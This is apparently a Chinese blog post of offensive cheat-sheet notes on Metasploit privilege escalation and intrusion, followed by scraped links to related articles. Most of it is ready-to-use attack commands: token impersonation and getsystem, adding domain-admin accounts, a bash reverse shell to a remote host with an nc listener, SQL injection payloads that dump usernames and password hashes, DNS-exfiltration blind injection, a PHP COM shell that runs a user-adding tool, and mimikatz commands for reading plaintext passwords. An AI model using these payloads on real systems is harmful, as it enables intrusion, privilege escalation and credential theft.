令牌(token)相当于系统的临时密钥(账号及密码)

加载incognito模块

meterpreter> use incognito

meterpreter > list_tokens -u    //列出可用令牌

meterpreter > impersonate_token WIN-xxxxxxxxx\\Administrator   //模拟令牌

[+] Successfully impersonated user WIN-xxxxxx\Administrator  //成功模拟成administrator用户

meterpreter > getsystem   //自动尝试提权

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid   //当前会话用户身份

Server username: NT AUTHORITY\SYSTEM

delegation授权令牌

impersonation 模拟令牌

需要两个反斜杠

impersonate_token win7-pc\\administrator

添加域用户

net user ihoney ihoney1 /add /domain

添加到管理员组

net group “domain admins” ihoney /add /domain

查看域管理组

net group “domain admins” /domain

上传exe

upload /root/ma.exe c:\

肉鸡:

[root@xxx hashcrack]# bash -i >& /dev/tcp/yyy/9999 0>&1

黑客机先监听:

[root@yyy ~]# nc -vv -l -p 9999

报错注入

and 1=(updatexml(1,concat(0x3a,(user())),1))#

whois信息收集

直接输入whois 目标网址(不用加www)

或者输入whois 目标IP地址

高级扫描方式:(扫描网段开了某端口的主机)

use auxiliary/scanner/ip/ipidseq

show options

set RHOSTS 目标IP网段比如2.0/24

set THREADS 50

run

扫描某主机端口

use auxiliary/scanner/portscan/syn

show options

set RHOST 目标IP

set THREADS 50

run

扫描开了smb服务的主机

use auxiliary/scanner/smb/smb_version

show options

set RHOSTS 目标网段/24

set THREADS 50

run

mssql 主机

use auxiliary/scanner/mssql/mssql_ping

show options

set RHOSTS 扫描网段/24

set THREADS 50

run

SSH服务器扫描

use auxiliary/scanner/ssh/ssh_version

show options

set RHOSTS 扫描网段/24

set THREADS 50

run

Telnet服务器扫描

use auxiliary/scanner/telnet/telnet_version

show options

set RHOSTS 扫描网段/24

set THREADS 50

run

FTP主机扫描

use auxiliary/scanner/ftp/ftp_version

show options

set RHOSTS 扫描网段/24

set THREADS 50

run

扫描FTP匿名登陆

use auxiliary/scanner/ftp/ftp_anonymous

show options

set RHOSTS 扫描网段/24

set THREADS 50

run

扫描局域网内有哪些主机存活

use auxiliary/scanner/discovery/arp_sweep

set RHOSTS 扫描网段/24

set THREADS 50

run

扫描网站目录

use auxiliary/scanner/http/dir_scanner

set RHOST 目标IP

set THREADS 50

run

扫描SNMP主机:

use auxiliary/scanner/snmp/snmp_login

set RHOSTS 扫描网段/24

set THREADS 50

run 搜索目标网站中的E-mail地址

use auxiliary/gather/search_email_collector

set DOMAIN 目标网站(不加www)

run

嗅探抓包(ftp)

use auxiliary/sniffer/psnuffle

run

httpsdnslog平台

https://exeye.io/register

sql盲注执行:

union select 1,load_file(concat(0x5c5c5c5c,version(),0x78782E74657374312E69686F6E65797365632E746F702F696969));

数据库执行时会访问dnslog域名:

xx.test1.ihoneysec.top/iii

[更新]Mysql身份认证漏洞及利用(CVE-2012-2122)www.freebuf.com/vuls/3815.html

常用提权命令:

whoami

net user

net view

net start 启动的服务

systeminfo

hostname

ipconfig /all

tasklist /svc 寻找Termservice找到PID

netstat -ano 找到监听端口

arp -a

route print

netsh firewall show state

netsh firewall show config

dir

type

copy

相关文章:

http://www.5kik.com/phpnews/3.html (php利用wsh以及Shell.Application执行命令)

https://blog.csdn.net/jaray/article/details/49093317(运行Php提示COM未找到)

https://www.cnblogs.com/phpk/p/6097353.htmlini_set("display_errors","On");和error_reporting(E_ALL);

前提:

需要知道网站路径,上传wucanshu.exe(F4ck的api加用户工具)

访问http://ip/wsh.php

<?php

ini_set("display_error", "On");

error_reporting(E_ALL);

echo 1;

$wsh = new COM("shell.Application") or dir("Failed!");

$exec = $wsh->open("C:\\www\\wucantishi.exe");

echo $exec;

echo 21;

?>

运行即API添加用户:

UserName:F4ck

PassWord:F4ckTeam!@#

菜刀下载大文件可能会失败,改后缀为rar用浏览器下载

IIS 8.0默认404禁止下载mdb后缀文件

两条命令读取明文密码:

privilege::debug

sekurlsa::logonpasswords

msf加载mimikatz读明文:

meterpreter > use mimikatz

meterpreter > wdigest

F4ck带参数添加用户:

7.exe ceshi 12345678 administrator /add

会克隆一个管理员用户

抓取sqlmap的爆所有数据库名语句:

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT NULL,NULL,CONCAT(0x716a626a71,IFNULL(CAST(schema_name AS CHAR),0x20),0x7171786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA%23

手工测试读取数据库名:

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(schema_name),4,5,6,7,8,9,10,11,12 FROM INFORMATION_SCHEMA.SCHEMATA%23

表名:

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(table_name),4,5,6,7,8,9,10,11,12 FROM INFORMATION_SCHEMA.tables where table_schema=0x736561%23

列名:

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(column_name),4,5,6,7,8,9,10,11,12 FROM INFORMATION_SCHEMA.columns where table_schema=0x736561 and table_name='nh_user'%23

读账密:

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(id,'%2c',username,'%2c',password),4,5,6,7,8,9,10,11,12 FROM sea.nh_user%23

[0001]《1,xiaodi,c44af6fc4c97a6b1e93885cc4ae399f2》

msf提权基础(一)的更多相关文章

  1. windows下提权基础

    拿到webshell很多时候代表渗透的开始,下面带来windows提权基础 环境:虚拟机 win7系统 首先:查看权限whoami 我们知道windows的高权限应该是administrator和sy ...

  2. msf提权命令/meterpreter下的几个命令

    废话: 今天本来日学校内网.以为是台08.结果稀里糊涂居然日了宿舍哥们儿的PC机.按道理都该装杀毒的才对,我舍友都不装的.裸装上阵说的就是我舍友了.劝各位大佬.把杀毒装好.补丁打好. 通过这次我也学到 ...

  3. Msf提权步骤

    1.生成反弹木马(脚本,执行程序) msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=&l ...

  4. 【渗透测试】Msf提权步骤

    1.生成反弹木马(脚本,执行程序) msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=&l ...

  5. 渗透之——MSF提权

    在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的! 我们先用msfvenom生成一个EXE的木马后门. ms ...

  6. Linux提权基础

    英文原文: Basic Linux Privilege Escalation 在开始之前,我想指出 - 我不是专家. 据我所知,在这个巨大的领域没有一个“魔法”的答案. 这只是我的发现,写出来,共享而 ...

  7. 【译】Linux提权基础

    英文原文: Basic Linux Privilege Escalation 在开始之前,我想指出 - 我不是专家. 据我所知,在这个巨大的领域没有一个“魔法”的答案. 这只是我的发现,写出来,共享而 ...

  8. 提权基础-----mysql-udf提权

    1.总结关于udf提权方法 通过弱口令,爆破,网站配置文件等方式得到mysql数据库帐号密码,---还要能外连 (1).将udf.dll代码的16进制数声明给my_udf_a变量 set @my_ud ...

  9. windows提权基础大全

    Not many people talk about serious Windows privilege escalation which is a shame. I think the reason ...

随机推荐

  1. NGINX防御CC攻击教程

    CC攻击即http flood,以攻击成本低(只需数台http代理服务器即可实现攻击).隐蔽性强(中小CC攻击一般不会造成网络瓶颈).难防御(与正常访问的请求很难区分开).威力强大(造成和DDOS流量 ...

  2. spring boot入门笔记 (二) - application.properties配置文件

    项目最重要的一个东西,用来定义整个项目的一些东西(端口.访问项目的名称.数据源.日志.集成mybatis等框架.静态资源目录.thymeleaf.热部署等),很重要很重要的. #整个项目的端口号,默认 ...

  3. java设计模式-----10、享元模式

    Flyweight模式也叫享元模式,是构造型模式之一,它通过与其他类似对象共享数据来减小内存占用.它使用共享物件,用来尽可能减少内存使用量以及分享资讯给尽可能多的相似物件:它适合用于只是因重复而导致使 ...

  4. Linux 调试: systemtap

    安装与配置 在ubuntu下直接用apt-get install之后不能正常使用,提示缺少调试信息或者编译探测代码时有问题. 1. 采用官网上的解决方法 2. 可以自己重新编译一次内核,然后再手工编译 ...

  5. csharp:获取 DNS、网关、子网掩码、IP

    /// <summary> /// DNS.网关.子网掩码.IP /// 涂聚文 2015 /// </summary> public class IPAddressStrin ...

  6. 使用手机预览移动端项目(Vue)

    1.在 npm run dev 启动Vue项目之后.例:http://localhost:8095/#/chatList 2.查看本机的 IP (WIN + R + cmd ) 输入 ipconfig ...

  7. 原生爬虫小Demo

    import re from urllib import request class Spider(): url = 'https://www.panda.tv/cate/lol' #[\s\S]匹配 ...

  8. xcrun: error: invalid active developer path (/Applications/Xcode.app/Contents/Developer)解决办法

    背景 mac下卸载了xcode,使用git等命令时就提示错误.invalid active path(Applications/Xcode.app/Contents/Developer),这种情况可以 ...

  9. Android 对话框(Dialog)

    Activities提供了一种方便管理的创建.保存.回复的对话框机制,例如 onCreateDialog(int), onPrepareDialog(int, Dialog), showDialog( ...

  10. docker实战 (1) 关于docker的安装

    docker定义: Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的 Linux 机器上,也可以实现虚拟化.容器是完全使用沙箱机制 ...